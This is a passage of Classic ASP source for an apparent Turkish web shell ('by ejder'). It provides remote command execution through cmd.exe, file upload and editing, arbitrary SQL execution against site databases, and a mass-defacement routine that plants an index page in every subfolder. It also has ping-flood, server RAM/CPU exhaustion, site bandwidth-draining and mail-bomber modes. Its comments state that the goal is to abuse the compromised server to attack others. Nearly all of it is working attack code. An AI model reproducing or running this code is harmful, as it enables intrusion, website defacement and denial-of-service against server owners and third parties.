Response.Write "<br><br><input type=submit value="" .. ::   Kaydet  :: ..  ""><br><br></td></tr><tr><td align=""center"">"
Response.Write "<textarea name=""islem"" style='width:90%;height:350;'>"
Response.Write server.HTMLEncode(f.readAll)
Response.Write "</textarea></td></tr></table></form></center>"
Call Hata
nolist = True

CASE 11 ' Editleme olayıı gerçekleşiyorr by ejder
on error resume next
set saveTextFile = FSO.OpenTextFile(file,2,true,false)
Call Hata
saveTextFile.Write(islem)
saveTextFile.close
if err<>0 then
olmadi("Editlenemedii")
else
oldu("Editlendi")
end if

CASE 12 ' Resim Dosyasını Görüntülee  by ejder
on error resume next
Response.Write "<br><center><img ALT=""SaVSaK.CoM by ejder =) "" src='"&file&"'></center><br><br>"
Call Hata
nolist = True

CASE 13 ' SQL için TAbloları Listeleme by ejder
Response.Write "<center><b><font size=3>Tablolar</font></br><br>"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = file
objConn.Open
objADOX.ActiveConnection = objConn

response.write "<table class=""kbrtm"">"
For Each table in objADOX.Tables
    If table.Type = "TABLE" Then
        Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=14&file="&file&"&table="&table.Name&"&konum="&FolderPath&"&time="&time&"'>"&table.Name&"</a></td></tr>"
    End If
Next
response.write "</table>"
response.write "</center>"
Call Hata
nolist = True

CASE 14 ' TAblo içeriği görüntüleme by ejder
Call SQL_menu_by_ejder
Call SQL_by_ejder(file,table)
nolist = True

CASE 15 ' SQL kod yerleştirme olayı by ejder
if islem = "select" then inject = inject1
if islem = "delete" then inject = inject2
if islem = "insert" then inject = inject3
if islem = "update" then inject = inject4
if islem = "diger" then inject = inject5
SQL_menu_by_ejder
response.write "<br><center>Db Yeri : <font color=#C6FCBE>"&file&"</font></center>"
response.write "<br><center>Sql komut : <font color=#C6FCBE>"&inject&"</font></center><br>"
if islem = "select" then
    if not ejdersql = "" then
        Call MSSQL_by_ejder(ejdersql,inject)
    else
        Call SQL_by_ejder(file,inject)
    end if
else
on error resume next
if ejdersql = "" then
    Set objConn = Server.CreateObject("ADODB.Connection")
    Set objRcs = Server.CreateObject("ADODB.RecordSet")
    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
    objConn.ConnectionString = file
    objConn.Open
else
    Set objConn = Server.CreateObject("ADODB.Connection")
    Set objRcs = Server.CreateObject("ADODB.RecordSet")
    objConn.Open ejdersql
end if

if err <> 0 then
    response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Bağlantınız SağlanaMAdıı !!! by ejder :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
    on error resume next
    objRcs.Open inject,objConn, adOpenKeyset , , adCmdText
    if err <> 0 then
        Call olmadi("<br>SQL İnjection Komutunuzda HATA var. Bilmiyorsan Kullanma<br><br>")
    else
        Call oldu("<br> SQL İnjection Başarıyla GErçekleştii.<br><br>")
    end if
end if
objRcs.close
objConn.close
end if
nolist = True

CASE 16 ' Dosya ADI değiştirme Formu by ejder
on error resume next
response.write "<table width=""100%"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyanameedit"" action='"&FilePath&"' type=""post"">"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"" >"
tablo30(" <b>Dosya ADı değiştirme MErkezi</b>")
tablo30("Adı :  <font color=#C6FCBE>"&islem&"</font> <br> Yeri :  <font color=#C6FCBE>"&file&"</font>")
response.write "<input type=""hidden"" value=""17"" name=""mode""><input type=""hidden"" value="&file&" name=""file""><input type=""hidden"" value="&FolderPath&" name=""konum""><input type=""hidden"" value="&time&" name=""Time""> " 
tablo12("<b>Dosyanın Yeni Adı:  </b> &nbsp;<input  size=""30"" type=""text"" name=""islem"" value="&islem&">")
tablo12("<br><input value="" Gönder "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
Call Hata

CASE 17 ' Dosya Adı değiştirme Olayı gerçekleşiyor by E_JDER
on error resume next
Set fileObject = fso.GetFile(file) 
fileObject.Name = islem 
if err <> 0 then
    Call olmadi("<br>DOsya Adı değişeMEdii<br><br>")
else
    Call oldu("<br>Dosya Adı değişti<br><br>")
end if
Set fileObject = Nothing 
Call Hata

CASE 18 ' MAss Defeced Merkezi by ejder
on error resume next
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""massattack"" action='"&FilePath&"?mode=19' method='post'>"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"
tablo30(" <b>MASS Defaced Merkezi</b>")
tablo30("...... :::::  İndex KOD unu Aşağıya Yaz / Yapıştır   ::::: ......")
tablo30("<br><b>Konum : </b><input style=""color=#C6FCBE"" size=""60"" name=""masskonum"" value='"&konum&"' type=""text""><br><br>")
response.write "<input type=""hidden"" value=""19"" name=""massmode""><input type=""hidden"" value="&time&" name=""Time""> " 
tablo12O("<textarea  style=""width:500px; height:250px"" name=""massfile""></textarea>")
tablo12O(" <input type=""radio"" value=""brute"" name=""massislem"" checked> Brute  -   <input value=""single"" type=""radio"" name=""massislem"" > Single   -   <input value=""ozel"" type=""radio"" name=""massislem"" > Private <input name=""massinject1"" value=""z.html"" type=""text"" size=15>  &nbsp;&nbsp; <input value=""ok"" type=checkbox name=""masshash3"" >Eklenti <input size=15 name=""masshash2"" value=""httpdocs\"" type=""text"">")
tablo12O("<input name=""masshash9"" value=""copy"" type=radio checked> Kopyalayarak  -  <input name=""masshash9"" value=""yarat"" type=radio> Oluşturarak")
tablo12O("<input value="" Havayaa Uçurr "" type=""Submit"">")
yazsol("<font color=#C6FCBE><b>Brute : </b>Belirtilen Dizinin ALtındaki; Tüm Dizinlere ve onlarında ALt Dizinleri İndex BAsar. </font>")
yazsol("<font color=#C6FCBE><b>Single : </b>Belirtilen Dizinin ALtındaki; Alt Dizinlere İndex BAsar. </font>")
yazsol("<font color=#C6FCBE><b>Private : </b>Belirtilen Dizinin ALtındaki; Alt Dizinlere İstediğiniz İsimle İndex BAsar. </font> ")
yazsol("<font color=#C6FCBE><b>Eklenti : </b>BRUTE & Single ile kullanılır. Permsion var ise bunu seçmenize ayarlamanıza gerek yok. Eğer site isimlerini listeleytebiliyor, ve içine girremiyor fakat klasör atlayarak girebiliyorsanız. o zaman bunu seçin ve bulunan klasörrden sonrakine gidip oraya index leri atar. Mesela ; '..site\savsak_com', '..\site\haber_com' .. gibi siteelr listeli. bunların içlerine giridğinizde görüntülkeme yetkinzi yok . Ama eğer '..\site\savsak_com\www\' yapınca girebiliyorsnaız. PERMİSİON aşma yöntemidir. böylece Eklenti yerine 'www' yazarak ve seçerekden. tüm sitelere o klaösr içine girme yetkisini sağlayıp, index bıraktırırrız. </font> ")
yazsol("<font color=#C6FCBE><b>Kopyalayarak : </b>FSO dizinine bir TXT yazar. Sonra onu TÜm  klasörlere KOpyalayarak işlem yapar. Eğer FSO dizininde yazma yok ise, işlem gerçekleşmez. TÜM MASS lar böyledir. </font> ")
yazsol("<font color=#C6FCBE><b>Yaratarak : </b>Direk index kodunuzu, Klasölerde OLUŞTURARAk MASS yapar. BU ejder &  SaVSaK.CoM FARkı ile. 1-2 defa başıma geldi=) o yüzden bu özelleiği ekledim.</font> ")
yazsol("<font color=#FE7A84><b>NOT : </b>Brute & Single da 9 çeşit index basar, Private da İstdiğiniz İsimle 1 tane atar ;) </font>")
response.write "</table></td></form></tr></table><br>"
Call Hata

CASE 19 ' MAss Attack İŞleniyor. Eğer İndex yok ise, Hata ve FOrm sunuyor, aksi halde MASS yapıyor. 
konum = request.form("masskonum")
filee = request.form("massfile")
islem = request.form("massislem")
hash9 = request.form("masshash9")
hash2 = request.form("masshash2")
hash3 = request.form("masshash3")
inject1 = request.form("massinject1")

filee = filee&"<center><br><br><font color=green><b>orospu ejder ;)</b></font><br></center>"
inject7 = filee
if hash9 = "copy" then
on error resume next
a=Left(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),InStrRev(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),"\"))
Set hackindex = FSO.CreateTextFile(a&"\ejder.txt", True)
hackindex.write filee
if err <> 0 then
response.write "<center><br><font color=#FE7A84> <font face=Wingdings size=5>N</font> Bulunduğun Dizinde Yazma YEtin yok. Bu yüzden İndex Sayfası oluşturulamadı. <font face=Wingdings size=5>N</font> <br><br>  <font face=Wingdings size=5>N</font>  Eğer ki Server içine bir Tane index yükler ve aşağıdaki yere tam link ini yazarsan, O zaman MASS Defaced başlıyacaktır. <font face=Wingdings size=5>N</font> <br><br><br></center>"
response.write "<table width=""100%"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
response.write "<input type=""hidden"" name='islem' value='"&islem&"'><input type=""hidden"" name='inject1' value='"&inject1&"'><input type=""hidden"" name='file' value='"&file&"'><input type=""hidden"" name='Time' value='"&time&"'><input type=""hidden"" name='mode' value='20'><input type=""hidden"" name='konum' value='"&konum&"'>"
Call tablo30("<b>İndex in Server daki kendi İndex inin YErini GÖster. </b>")
Call tablo30("&nbsp;")
Call tablo12("<input  size=""80"" type=""text"" name=""hacked"" style='color=#C6FCBE' value='"&FolderPath&"&/index.html'>")
Call tablo12("<br><input value="" OK tamamdır. İndex imi seçtim.  "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
else
set hacking = nothing
hacked = a&"\ejder.txt"
hash6 = konum
Call MassAttack2(konum,filee,hash2)
Call MassAttack(hash6,filee,hash2)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by ejder ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandı... ')</script>"
end if
else  if hash9 = "yarat" then
hash6 = konum
Call MassAttack2(konum,filee,hash2)
Call MassAttack(hash6,filee,hash2)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by ejder ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandı...1 ')</script>"
end if 
end if
Call Hata

CASE 20 ' Hata sonucu, düzeltme yapıldı ise, burdan MAss dewaam ediyor.
on error resume next
Set cloner2 = fso.GetFile(hacked)
if err <> 0 then
response.write "<br><br><br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> İndex Bulunamadı. KOnumunu veridğin İndex yada Dosya BULUNAMADI. Mass Durdurudu !!!  <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br><br><br>"
set cloner2 = nothing
else
set cloner2 = nothing
file="ejder"
hash6 = konum
Call MassAttack2(konum,file,hash2)
Call MassAttack(hash6,file,hash2)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by ejder ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandı...2 ')</script>"
end if
Call Hata

CASE 21 ' MASS tester formu by ejder
on error resume next
response.write "<table width=""100%"" class=""kbrtm"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""masstester"" action='"&FilePath&"' type=""post"">"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"
tablo30(" <b>MASS Permision Tester</b>")
tablo30("...... :::::  İzinleri Kontrol Eder   ::::: ......")
tablo30("<br><b>Konum : </b><input style=""color=#C6FCBE"" size=""60"" name=""konum"" value='"&konum&"' type=""text""><br><br>")
response.write "<input type=""hidden"" value=""22"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""> " 
tablo12O("<br><input value="" Teste Başlaaaa... =) by ejder "" type=""Submit""><br><br>")
tablo12("&nbsp;")
response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""left"" width=""100%""  ><font color=#C6FCBE><b>NOT : </b>Bununla, Alt klasörlerde Permision varmı yok mu ,Onu kontrol eder ve Listeler... </font>  <font color=#C6FCBE face=Wingdings size=5>N</font></td></tr>"
response.write "</form></table></td></tr></table><br>"
Call Hata

CASE 22 ' MASS TEster işleme görüntüleme by ejder
Call Tester(konum)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by ejder ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Yetki Kontrolu tamamalandı... ')</script>"
Call Hata

CASE 23 ' arama bulma- en güzel özeliği time out olmaması bulduğunu yazmasıdır =) by ejder eseridir. 
response.write  "<br><center>"
i=0
Call arama(konum)
response.write  "</center><br>"
Response.Write "<script language=javascript>alert('"&i&" Kayıt Bulundu .... ')</script>"
nolist = True
Call Hata

CASE 24 ' Klasör işlermleri için Upload - Dosya ayarat - klaösr yarat FORM ları by ejder
on error resume next  
response.write "<table bgcolor=#000000 width=""100%"" ><tr><td>"
response.write "<center><table width=""100%""><tr><td class=""kbrtm"" align=""center""> Upload Merkezi  </td></tr><tr><td align=""center"" class=""kbrtm"">"
response.write "<form name=frmUpload method=post enctype=""multipart/form-data"" action='"&FilePath&"?mode=25&Time="&time&"&Path="&konum&"' ID=""Form1"">"
response.write "<input type=hidden name=folder value='"&konum&"' ID=""Hidden1"">"
response.write "Max: <input type=text name=max value=5 size=5 ID=""Text1""> <input type=button value=""Ayarla"" onclick=setid() ID=""Button1"" NAME=""Button1"">"
response.write "<table ID=""Table1"">"
response.write "<tr>"
response.write "<td id=upid>"
response.write "</td>"
response.write "</tr>"
response.write "</table>"
response.write "<input type=submit value="" ... ::  Upload  :: ... "" ID=""Submit1"" NAME=""Submit1"">"
response.write "</form>"
response.write "<script>"
response.write "setid();"
response.write "function setid() {"
response.write "    str='';"
response.write "    if (frmUpload.max.value<=0) frmUpload.max.value=1;"
response.write "    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input size=30 type=file name=file'+i+'><br>';"
response.write "    upid.innerHTML=str+'<br>';"
response.write "}"
response.write "</script>"
response.write "</td></tr></table></center>"
response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""dosycrete"" action='"&FilePath&"?mode=26&konum="&konum&"&Time="&time&"' method=""post""><tr><td align=""center"">Klasör Oluştur : <input name=""file"" value=""ejder"" type=""text""> <input name=""git"" value="" Oluştur "" type=""Submit""></td></tr></table></form></center>"
response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""filemaker"" action='"&FilePath&"?mode=27&konum="&konum&"&Time="&time&"' method=""post""><tr><td align=""center"">Dosya Adı : <input name=""file"" value=""ejder.asp"" type=""text""></td></tr><tr align=""center""><td><textarea style='width:100%;height:100;' name=""islem""></textarea></td></tr> <tr align=""center""><td><input name=""git"" value=""..:: Oluştur ::.."" type=""Submit""></td></tr></table></form></center>"
response.write "</td></tr></table>"
Call Hata

CASE 25 ' Upload işlemi by E_JDER
Upload()

CASE 26 ' Klasör yarat by ejder
response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"
if FSO.FolderExists(konum&"\"&file) = True then
response.write "<center> <font color=#FE7A84> <font  face=Wingdings size=5>N</font> Böyle Bir Klasör ZATEN VAr !!!! <font color=#FE7A84> <font  face=Wingdings size=5>N</font> </font> </center>"
else
on error resume next
FSO.CreateFolder(konum&"\"&file)
if err <> 0 then
olmadi("Klasör Oluşturulamadı")
else 
oldu("Klasör Oluşturuldu")
end if
end if
response.write "</td></tr></table>"
Call hata

CASE 27 ' Dosya yarat by ejder
response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"
on error resume next
Set MyFile = FSO.CreateTextFile(konum&"\"&file, True)
MyFile.write islem
if err <> 0 then
olmadi("Dosya Oluşturulamadı")
else 
oldu("Dosya Oluşturuldu")
end if
response.write "</td></tr></table>"
MyFile.close()
Call hata

CASE 28 ' CMD Formu ve işlem yeri  by ejder
if cmdkod="" then cmdkod="ipconfig"
response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"
response.write "<form name=""commmanderbyejder"" method=""Post"" action='"&FilePath&"?mode=28&konum="&konum&"'> <b>CMD Komut Listele : </b><input style='color=#DAFDD0' name=""cmdkod"" size='57' value='"&cmdkod&"' type='text'><input name='"&konum&"' value='"&konum&"' type='hidden'><input name='"&mode&"' value=""28"" type='hidden'><input name='"&file&"' value=""a"" type='hidden'><input value="".:Görüntüle:."" type='Submit'> "
response.write "</td></tr></form></table></center>"
response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"
response.write "<textarea style='color=#DAFDD0;width:100%;height:320;'>"
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdkod).stdout.readall
response.write "</textarea>"
response.write "</td></tr></form><form name=""commmanderbyejder2"" method=""Post"" action='"&FilePath&"?mode=28&konum="&konum&"'><tr><td><b>CMD Komut Çalıştır: </b><input style='color=#DAFDD0' name=""inject4"" size='57' value='"&inject4&"' type='text'><input name='inject5' value='ejder' type='hidden'><input value="" .: Çalıştır :. "" type='Submit'></td></tr>"
if inject5 = "ejder" then
on error resume next
tablo12("Komut Çalıştırıldı. ")
end if
response.write "</form></table></center>"
response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm"">"
yazorta("<a href='"&FilePath&"?mode=29&konum="&konu&"&Time="&time&"' onclick=""cmdhelp(this.href);return false;"">-->>  Kullanılabilir CMD komutlarından Hepsi   <<-- </a>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b>By_ejder</b></td></tr></td></tr></table></center>"


CASE 29 ' CMD açıklama kısmı HELPER by ejder
response.write "<center>"
yazsol("<b>Attrib</b>: Attrib komutu dosyalara belli özellikleri verir veya kaldırır. c:\>attrib +r +a +s +h yazıp enter tuşuna basarsak.(help için : <b> ' attrib /?  ' </b>)")
yazsol("<b>Copy - xcopy</b> : Copy ve xcopy komutu ile istenilen dosya yada dosyaların başka yerlere kopyalanması işlemi gerçekleştirilir. Bilgi için bunu yazın :' <b>copy /? '</b>")
yazsol("<b>Net use</b> : Pc nin Paylaşım, Hesapları, ayarları, kullanıcıları... gibi özellliklere ulaşabileceğimiz ve değiştirebileceğimiz bir komut <b>NET</b> . Yarım dosyası için -> <b> net help </b> yazmanız yeterlidir.")
yazsol("<b>Netstat</b> : PC deki açık portları, ve dilediğiniz port u dinleyebilirsiniz. <b>Netstat -a -b -e -n -o -r -s -v</b> gibi parametreler alır.")
yazsol("<b>Tracert</b> : Site, Ip, server ın nerde olduğunu tracert yapar. <b>tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name</b> ")
yazsol("<b>IPCONFIG</b> : Server , PC nin IP bilgileirni, network bilgileirni veriyor. kulnım için - > <b>ipconfig help</b>  yazın yeterldir ")
yazorta("<b>by ejder</b>")
response.write "</center>"

CASE 30 ' PiNGer BY ejder - Server üzerinden sınırsız ping saldırrısı. =) ehehe by ejder
if not file = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td><form action='"&FilePath&"?mode=30&file=1&konum="&konum&"' method='post' name='pingerbye_jder'>"
yazsol(" Site Adı : <input style='color=#DAFDD0' name='url' value='siteadı.com' type='text' size=30> (Örnek: google.com) ")
yazsol(" Ping Sayısı : <input style='color=#DAFDD0' name='inject1' value='20' type='text' size=20> (Örnek: 20) ")
yazsol(" Ping TimeOut Süresi : <input style='color=#DAFDD0' name='islem' value='750' type='text' size=20> milisaniye (Örnek:750) ")
yazsol(" Paket Boyutu : <input style='color=#DAFDD0' name='size' value='32' type='text' size=20> byte (32) ")
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <input name='bombalaejder' value=' .::  Bombala  ::. ' type='Submit' > </td></tr></table>"
response.write "</form></td></tr></table>"
yazsoll("  <font color=#C6FCBE> Not: Bunu kullanırken gireceğiniz Paket boyutu Önemlidir. Mümkünce aşırı büyük paket girmeyin, çünkü server yada site nereye saldırrıyorsanız, büyük paketleri filtreler ve cevap vermezler. O yüzden sürekli TİmeOUT yazar. o yüzden yaa Boş bırakın yada 500 gibi normal bir seviye seçin.  <font color=#C6FCBE> <font face=Wingdings size=5>N</font> </font>  ")
yazsoll("<font color=#C6FCBE> Not: PİNG sayısını 98 dediniz mesela, Sistem bunu 10 hamlede yapacaktır. 10 arlı gönderektir. vede süreklisayfa kendini yenileyip, 98 olana kadar 10 ar 10 ar ping ee dewam edecektir. Burda TİMEout OLMA gibi sorunumuz yok. 100000 deseniz bile, o bitne kadar gece gündüze ping çekebilien sistem geliştirdim. Korkmadan, vede gece açık bırakarak sınırsız pingler çekebilirisniz.  <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
yazsoll(" <font color=#FE7A84> Not: savsak, com.tk, gov.tk uzantılı sitelere karşı koruma aldım. Ping Attaker bu sitelere karşı Çalıştıtılamaz, ve çalışıtırlsa bile Ping atmaz, size Uyarı verir. TÜrk Siteleri Koruma ilk hedefimizdir. TÜrk TÜrk ü Vurmaz. by ejder <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
yazsoll("<font color=#C6FCBE> <b>Ping Attack ejder</b> tarafından yazılmış olup, biraz hayal gücü, biraz çaba azimle, şu an kulanıdğınız FSO yuda yazan olarak, bundaki amacım Server ın ,sitenin kaynaklarını sömürmek vede onun üzerinden onun kaynaklarını kullanrak başka yerlerede zarar , saldırı yapam güdenmiştir. BUndada BUnlaa başladım. <b>TÜM hakları ejder e aittir.</b> <font color=#C6FCBE> <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font>  ")
else
if inject1 = "" then inject1 = 0
if count = "" then count = 0
if CInt(inject1) > CInt(count) + 10 then
    Call Ping_Bomb_ejder(url,10,islem,size)
    count = count + 10
    inject2 = ""&FilePath&"?file=1&mode=30&url="&url&"&size="&size&"&count="&count&"&inject1="&inject1&"&islem="&islem&""
    response.write "<META http-equiv=refresh content=2;URL='"&inject2&"'>"
    response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&count&"/"&inject1&"</b> tane Ping Çekildi. </td></tr></table>"
else if CInt(inject1) > CInt(count) then
    Call Ping_Bomb_ejder(url,CInt(inject1) mod 11,islem,size)
    count = count + (CInt(inject1) mod 11)
    yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Çekildi... ")    
    yazortaa(" Pinger Attack by ejder 1.0 işlemini tamamladı...  ")
else 
    yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Çekildi... ")    
    yazortaa(" Pinger Attack by ejder 1.0 işlemini tamamladı...  ")
end if
end if
end if

CASE 31 ' Server RAM & CPU Saldırısı
cmdd = array("C:\WINDOWS\System32\mspaint.exe","C:\Program Files\Internet Explorer\iexplore.exe","C:\WINDOWS\system32\notepad.exe")
if islem = "1" then
on error resume next
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(0))
else if islem = "2" then
on error resume next
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(1))
else if islem = "3" then
on error resume next
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(2))
else
if not file = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td>"
yazorta("<b> RAM & CPU FUcker for SERVER by ejder =) 1.0 </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><font color=#C6FCBE>  Server ın CPu ve RAm kaynaklarını 1 dk içinde tüketebilen bir ejder eseridir. Bununla sadece, 3 tür program sürekli açılır ve kapatılmaz(Paint, Notepad, Explorer) Server en fazla 1 dk içinde Ram&Cpu sorunu ve kitlenmeler, cevap vermemeler, hatat resetlenme ilede sonuçlanabilir.</font></td></tr></table>"
yazorta(" <a href='"&FilePath&"?mode=31&file=1'>..::  RAM & CPU Attacker ı ÇALIŞTIR .. by ejder  ::..</a> ")
response.write "</td></tr></table></center>"
else
Call Ram_Cpu
end if
end if
end if
end if

CASE 32 ' Sİte kaynak Sömürücü by ejder =)
if not islem = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td>"
yazorta("<b> Sİte Kaynak Sömücü 1.0 by ejder </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""sitefuckerbyejder"" method='post' action='"&FilePath&"?mode=32'>Site Adresi : <input name='url' value='http://www.siteadi.com' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Robot Sayısı : <input name='file' style='color=#C6FCBE' type='text' value='50' size=30> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Sömür ::..' type='Submit'></td></tr></form></table>"
yazsol("Belirttiğiz kadar Robot kadar bağlanır ve siteyi sömürür. Ayrıca Saldırı sürekli kendini güceller, yeniler. Sonsuzdur. =) Robot u Bağlantınıza göre ayarlayın. Mesela; Robot u 50 yaparsanız.O sayfa içinde 50 tane aynı anda açılacak site ve indirecektir siteleri. ve o sırada sürekli siz, dosya indiroyr geçiçi olarak. VE bu olay her 30 snde güncelleniyor Otomatik. Birkez çalışıtr Ömür boyu kapatmazsan penceryi çalışır bir MAkina.")
yazsol("Site kodlarını, BAndwith ini ve ASP kitlenmesi yada SQL sömürmede, ressim, text sömürmede ÜStüne yoktur..")
yazorta("TÜm hakları Saklıdır by ejder =)")
response.write "</td></tr></table></center>"
else
on error resume next
yazorta("<b> Sİte Kaynak Sömücü 1.0 by ejder =) 1.0 </b>")
yazorta("Sömürme MEkanizması Devrede...")
yazsol("Durdurmak için Pencereyi kapat. "&file&" Kadar bağlanıp 30 sn da günceliyor saldırıyı...")
yazorta("<b>by ejder</b>")
Call Somurgen(file,url)
yazorta(" 20 SN sonra yenileniyor... by ejder =) ")
response.write "<META http-equiv=refresh content=20;URL='"&FilePath&"?mode=32&islem=1&url="&url&"&file="&file&"'>"
end if

CASE 33 ' Mail BOMber by ejder :) TÜm Kodların FSO nun HAkları E_J_D_E_R e aittir. Sınırsız Mail atma imkanı sunuyorum size. Kıyağımı unutmayın...
if not islem = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td>"
yazorta("<b> Mail Bomber 1.1 by ejder </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""mailbomberbyE_j_der"" method='post' action='"&FilePath&"?mode=33'>Mail Adresi : <input name='file' value='[email protected]' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Bomb Sayısı : <input name='count' style='color=#C6FCBE' type='text' value='50' size=22> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Bommbala ::..' type='Submit'></td></tr></form></table>"
yazsol("Sınırsız Mail Bomb. Cdonts & Cydos Destekler. %100 inbox. SaVSaK.CoM , com.tk, gov.tk maillerine Bomb yapamazsınız.")
yazorta("TÜm hakları Saklıdır by ejder =)")
response.write "</td></tr></table></center>"
else
on error resume next
if MailKorumasi(file) = 0 then
    if inject1 = "" then inject1 = 0
    if CInt(inject1) + 9 < CInt(count) then
        for j=0 to 10
            Call MailBomber_by_ejder(file)
        next
        inject1 = inject1 + 10
        response.write "<META http-equiv=refresh content=1;URL='"&FilePath&"?mode=33&islem=1&file="&file&"&count="&count&"&inject1="&inject1&"'>"
        response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... </td></tr></table>"        
    else if CInt(inject1)  < CInt(count) then
        for j=0 to (count mod 10)
            Call MailBomber_by_ejder(file)
        next
        inject1 = inject1 + (count mod 10)
        yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... ")    
        yazortaa(" Mail Bomber by ejder 1.0 işlemini tamamladı...  ")
    else
        yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... ")    
        yazortaa(" Mail Bomber by ejder 1.0 işlemini tamamladı...  ")
    end if
    end if
else
response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font  face=Wingdings size=5>N</font> BOMB yapılamadı. Tasvip etmediğimiz Bir mail e Saldırdığınız için. by ejder !!!! <font color=#FE7A84> <font  face=Wingdings size=5>N</font> </font> </td></tr></table>"
end if
if err <> 0 then
response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font  face=Wingdings size=5>N</font> Server Gerekli Olan Cdonts yada Cydos Bilesenlerini desteklemiyor. <font color=#FE7A84> <font  face=Wingdings size=5>N</font> </font> </td></tr></table>"
end if
end if

CASE 34 ' MSSQL - MYSQL Bağlantı Formu by ejder ;)
if not islem = "1" then
Call MSSQL_Form
yazortaa(" Eğerki, Sitelerin MSSQL bilgilerini biliyorsanız, bununla çok kolay bağlanabilir.. ")
yazortaa(" Tabloları görebilir, üzerinde SQL komut çalıştırabilir, verileri okuyaiblirisniz ")
yazortaa(" Çok sağlam ve güçlü bir MSSQL Manager hizmeti Sağlar size...")
yazortaa(" <b>by ejder :)</b>")
else
